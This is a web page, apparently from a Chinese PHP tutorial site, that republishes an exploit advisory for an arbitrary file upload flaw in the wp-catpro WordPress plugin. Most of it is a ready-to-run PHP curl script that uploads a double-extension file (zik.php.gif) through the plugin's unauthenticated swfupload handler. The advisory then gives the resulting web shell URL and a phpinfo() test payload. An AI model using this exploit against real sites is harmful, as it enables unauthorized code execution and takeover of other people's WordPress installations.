来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] #-----------------------------------------------------------------------Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability#---------------------------------------------------......
|
#-----------------------------------------------------------------------
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
作者 => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
####
#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png") // Allowed file extensions
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
#=> Exploit
-----------
<?php
$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
Shell Access : http://[ www.2cto.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
?>
<?php
phpinfo();
?>
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
